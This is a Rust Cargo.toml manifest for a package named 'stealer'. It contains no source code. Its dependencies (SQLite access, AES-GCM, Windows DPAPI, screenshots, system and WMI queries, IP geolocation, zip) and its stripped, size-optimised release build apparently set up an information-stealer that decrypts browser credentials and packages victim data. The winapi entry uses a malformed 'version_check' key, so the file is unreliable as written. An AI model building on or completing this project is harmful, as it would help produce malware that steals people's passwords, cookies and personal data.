[package]
name = "stealer"
version = "0.1.0"
edition = "2024"

[dependencies]
regex = "1.10.3"
walkdir = "2.4.0"
globwalk = "0.9.1"
rusqlite = { version = "0.31.0", features = ["bundled"] }
serde = { version = "1.0.197", features = ["derive"] }
aes-gcm = "0.10.3"
winapi = { version_check = "0.3.9", features = ["dpapi"] }
app_dirs = { package = "app_dirs2", version = "2.5.5" }
screenshots = "0.5.4"
sysinfo = "0.30.5"
zip = "0.6.6"
ipgeolocate = "0.3.6"
wmi = "0.13.2"
tokio = { version = "1.36.0", features = ["full"] }
base64 = "0.21.7"
whoami = "1.4.1"
my_internet_ip = "0.1.1"
serde_json = "1.0.82"
bincode = "1.3.3"

[profile.release]
lto = true
codegen-units = 1
opt-level = "z"
strip = true
panic = "abort"
debug  = false